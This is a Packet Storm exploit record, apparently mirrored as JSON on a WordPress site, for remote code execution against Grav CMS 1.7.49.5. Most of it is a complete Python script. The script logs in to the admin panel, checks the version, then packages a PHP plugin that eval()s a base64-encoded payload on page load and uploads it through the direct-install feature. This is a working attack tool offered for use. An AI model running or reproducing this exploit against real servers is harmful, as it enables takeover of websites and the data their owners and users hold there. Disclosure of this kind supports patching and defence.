{“lastseen”:”2026-04-23T16:46:30″,”description”:”This script targets a Grav CMS administrative panel by first authenticating, then checking version information to estimate vulnerability exposure. If conditions are met, it generates a malicious PHP plugin containing a base64-encoded payload and…”,”published”:”2026-04-23T00:00:00″,”modified”:”2026-04-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Grav CMS 1.7.49.5 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:219679″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : Grav CMS 1.7.49.5 Admin Plugin Upload Exploit RCE via Malicious PHP Plugin Injection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/github.com\/getgrav\/grav |\\n ==================================================================================================================================\\n \\n [+] Summary : This script targets a Grav CMS admin panel by first authenticating, then checking version information to estimate vulnerability exposure. \\n If conditions are met, it generates a malicious PHP plugin containing a base64-encoded payload and uploads it as a ZIP package through the \u201cdirect install\u201d feature. \\n Once installed, the plugin executes the payload via eval(), leading to remote code execution (RCE) on the server.\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import re\\n import zipfile\\n import io\\n import os\\n import sys\\n import time\\n from urllib.parse import urljoin\\n from html.parser import HTMLParser\\n import random\\n import string\\n import base64\\n \\n class GravExploit:\\n def __init__(self, target_url, username, password, payload):\\n self.target_url = target_url.rstrip(‘\/’)\\n self.username = username\\n self.password = password\\n self.payload = payload\\n self.session = requests.Session()\\n self.plugin_name = None\\n self.session.verify = False\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0’\\n })\\n \\n def check_grav_installation(self, html_content):\\n grav_checks = [\\n ‘data-gpm-grav’ in html_content,\\n ‘data-grav-field’ in html_content,\\n ‘data-grav-disabled’ in html_content,\\n ‘data-grav-default’ in html_content\\n ]\\n return sum(grav_checks) \\u003e= 2\\n \\n def login_form_present(self, html_content):\\n return ‘name=\\”data[username]\\”‘ in html_content and ‘name=\\”data[password]\\”‘ in html_content\\n \\n def extract_nonce(self, html_content):\\n nonce_match = re.search(r’name=\\”login-nonce\\”\\\\s+value=\\”([^\\”]+)\\”‘, html_content)\\n return nonce_match.group(1) if nonce_match else None\\n \\n def extract_admin_nonce(self, html_content):\\n nonce_match = re.search(r’name=\\”admin-nonce\\”\\\\s+value=\\”([^\\”]+)\\”‘, html_content)\\n return nonce_match.group(1) if nonce_match else None\\n \\n def extract_versions(self, html_content):\\n cms_version = None\\n admin_version = None\\n \\n cms_match = re.search(r’\\u003cspan[^\\u003e]*class=\\”grav-version\\”[^\\u003e]*\\u003e([^\\u003c]+)\\u003c\/span\\u003e’, html_content)\\n if cms_match:\\n cms_version = cms_match.group(1).strip().replace(‘v’, ”)\\n \\n admin_match = re.search(r’Admin v([\\\\d.]+)’, html_content)\\n if admin_match:\\n admin_version = admin_match.group(1)\\n \\n return cms_version, admin_version\\n \\n def version_compare(self, version, target_version):\\n if not version:\\n return False\\n \\n def normalize(v):\\n return [int(x) for x in v.split(‘.’)]\\n \\n try:\\n return normalize(version) \\u003c= normalize(target_version)\\n except:\\n return False\\n \\n def check(self):\\n try:\\n res = self.session.get(urljoin(self.target_url, ‘\/admin’))\\n if not res:\\n return \\”Unknown\\”, \\”Connection failed\\”\\n if res.status_code != 200:\\n return \\”Unknown\\”, f\\”Unexpected response code: {res.status_code}\\”\\n \\n if not self.check_grav_installation(res.text):\\n return \\”Safe\\”, \\”Target does not appear to be a Grav installation\\”\\n \\n if not self.login_form_present(res.text):\\n return \\”Detected\\”, \\”Grav detected but login form not accessible\\”\\n \\n cms_version, admin_version = self.get_versions_after_login()\\n \\n if not cms_version:\\n return \\”Detected\\”, \\”Grav CMS detected but version could not be determined\\”\\n \\n vuln = False\\n if self.version_compare(cms_version, \\”1.7.49.5\\”) and not self.version_compare(cms_version, \\”1.0.9\\”):\\n vuln = True\\n \\n if admin_version and vuln:\\n if self.version_compare(admin_version, \\”1.10.49.3\\”) and not self.version_compare(admin_version, \\”1.0.9\\”):\\n return \\”Appears\\”, f\\”Grav CMS {cms_version} is vulnerable\\\\nAdmin Plugin v{admin_version} is vulnerable\\”\\n \\n if not vuln:\\n return \\”Safe\\”, f\\”Grav CMS {cms_version} is not vulnerable\\”\\n \\n return \\”Safe\\”, f\\”Admin Plugin v{admin_version} is not vulnerable\\”\\n \\n except requests.RequestException as e:\\n return \\”Unknown\\”, f\\”Connection failed: {str(e)}\\”\\n \\n def get_versions_after_login(self):\\n auth_result = self.authenticate()\\n if auth_result not in [‘success’, ‘already_authenticated’]:\\n return None, None\\n \\n res = self.session.get(urljoin(self.target_url, ‘\/admin’))\\n if not res or res.status_code != 200:\\n return None, None\\n \\n return self.extract_versions(res.text)\\n \\n def authenticate(self):\\n try:\\n res = self.session.get(urljoin(self.target_url, ‘\/admin’))\\n if not res or res.status_code != 200:\\n return \\”connection_failed\\”\\n \\n if ‘grav-version’ in res.text and ‘login-nonce’ not in res.text:\\n return \\”already_authenticated\\”\\n \\n nonce = self.extract_nonce(res.text)\\n if not nonce:\\n return \\”connection_failed\\”\\n \\n login_data = {\\n ‘data[username]’: self.username,\\n ‘data[password]’: self.password,\\n ‘task’: ‘login’,\\n ‘login-nonce’: nonce\\n }\\n \\n res = self.session.post(urljoin(self.target_url, ‘\/admin’), data=login_data)\\n if not res:\\n return \\”connection_failed\\”\\n \\n if res.status_code in [301, 302, 303]:\\n res = self.session.get(urljoin(self.target_url, ‘\/admin’))\\n if not res:\\n return \\”connection_failed\\”\\n \\n if ‘name=\\”login-nonce\\”‘ in res.text:\\n return \\”login_failed\\”\\n \\n return \\”success\\”\\n \\n except requests.RequestException:\\n return \\”connection_failed\\”\\n \\n def login(self):\\n print(\\”[*] Authenticating…\\”)\\n result = self.authenticate()\\n \\n if result == \\”already_authenticated\\”:\\n print(\\”[+] Already authenticated\\”)\\n return True\\n elif result == \\”success\\”:\\n print(\\”[+] Login successful\\”)\\n return True\\n elif result == \\”connection_failed\\”:\\n print(\\”[-] Connection failed\\”)\\n return False\\n elif result == \\”login_failed\\”:\\n print(\\”[-] Login failed\\”)\\n return False\\n else:\\n print(\\”[-] Unexpected authentication error\\”)\\n return False\\n \\n def generate_php_plugin(self, plugin_name):\\n b64_payload = base64.b64encode(self.payload.encode()).decode()\\n class_name = f\\”{plugin_name.capitalize()}pluginPlugin\\”\\n \\n php_code = f”’\\u003c?php\\n namespace Grav\\\\\\\\Plugin;\\n use Grav\\\\\\\\Common\\\\\\\\Plugin;\\n \\n class {class_name} extends Plugin\\n {{\\n public static function getSubscribedEvents()\\n {{\\n return [\\n ‘onPagesInitialized’ =\\u003e [‘onPagesInitialized’, 0]\\n ];\\n }}\\n \\n public function onPagesInitialized()\\n {{\\n @eval(base64_decode(‘{b64_payload}’));\\n }}\\n }}\\n ”’\\n return php_code\\n \\n def build_plugin_zip(self, plugin_name):\\n php_code = self.generate_php_plugin(plugin_name)\\n \\n zip_buffer = io.BytesIO()\\n with zipfile.ZipFile(zip_buffer, ‘w’, zipfile.ZIP_DEFLATED) as zip_file:\\n zip_file.writestr(f\\”{plugin_name}plugin\/{plugin_name}plugin.php\\”, php_code)\\n zip_file.writestr(f\\”{plugin_name}plugin\/blueprints.yaml\\”, \\n f\\”name: {plugin_name.capitalize()}\\\\ntype: plugin\\\\nversion: 1.0.0\\”)\\n zip_file.writestr(f\\”{plugin_name}plugin\/{plugin_name}plugin.yaml\\”,\\n f\\”enabled: true\\”)\\n \\n return zip_buffer.getvalue()\\n \\n def upload_plugin(self, zip_data, plugin_name):\\n install_uri = urljoin(self.target_url, ‘\/admin\/tools\/direct-install’)\\n \\n res = self.session.get(install_uri)\\n if not res or res.status_code != 200:\\n print(\\”[-] Failed to fetch install page\\”)\\n return False\\n \\n nonce = self.extract_admin_nonce(res.text)\\n if not nonce:\\n print(\\”[-] Could not extract admin nonce\\”)\\n return False\\n \\n files = {\\n ‘uploaded_file’: (f'{plugin_name}.zip’, zip_data, ‘application\/zip’)\\n }\\n data = {\\n ‘task’: ‘directInstall’,\\n ‘admin-nonce’: nonce\\n }\\n \\n res = self.session.post(install_uri, data=data, files=files)\\n \\n if not res:\\n print(\\”[-] No response during plugin upload\\”)\\n return False\\n \\n if res.status_code in [301, 302, 303]:\\n self.session.get(install_uri)\\n \\n return True\\n \\n def exploit(self):\\n print(\\”[*] Authenticating to Grav admin…\\”)\\n if not self.login():\\n return False\\n \\n plugin_name = (random.choice(string.ascii_lowercase) + \\n ”.join(random.choices(string.ascii_lowercase + string.digits, k=17))).lower()\\n self.plugin_name = plugin_name\\n \\n zip_data = self.build_plugin_zip(plugin_name)\\n \\n if self.upload_plugin(zip_data, plugin_name):\\n print(\\”[+] Plugin uploaded successfully\\”)\\n return True\\n else:\\n print(\\”[-] Plugin upload failed\\”)\\n return False\\n \\n def cleanup(self):\\n if self.plugin_name:\\n print(\\”[!] Manual cleanup may be required\\”)\\n return True\\n return False\\n \\n \\n def main():\\n if len(sys.argv) != 5:\\n print(\\”Usage: python3 grav_exploit.py \\u003ctarget_url\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e \\u003cpayload\\u003e\\”)\\n sys.exit(1)\\n \\n target_url = sys.argv[1]\\n username = sys.argv[2]\\n password = sys.argv[3]\\n payload = sys.argv[4]\\n \\n import urllib3\\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n exploit = GravExploit(target_url, username, password, payload)\\n \\n print(\\”[*] Checking if target is vulnerable…\\”)\\n status, message = exploit.check()\\n \\n if status == \\”Appears\\”:\\n print(f\\”[+] {message}\\”)\\n if exploit.exploit():\\n print(\\”[+] Exploitation completed\\”)\\n exploit.cleanup()\\n else:\\n print(\\”[-] Exploitation failed\\”)\\n else:\\n print(f\\”[-] Target not vulnerable: {message}\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219679″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219679\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-23T16:46:30″,”description”:”This script targets a Grav CMS administrative panel by first authenticating, then checking version information to estimate vulnerability exposure. If conditions are met, it generates…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-48971","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n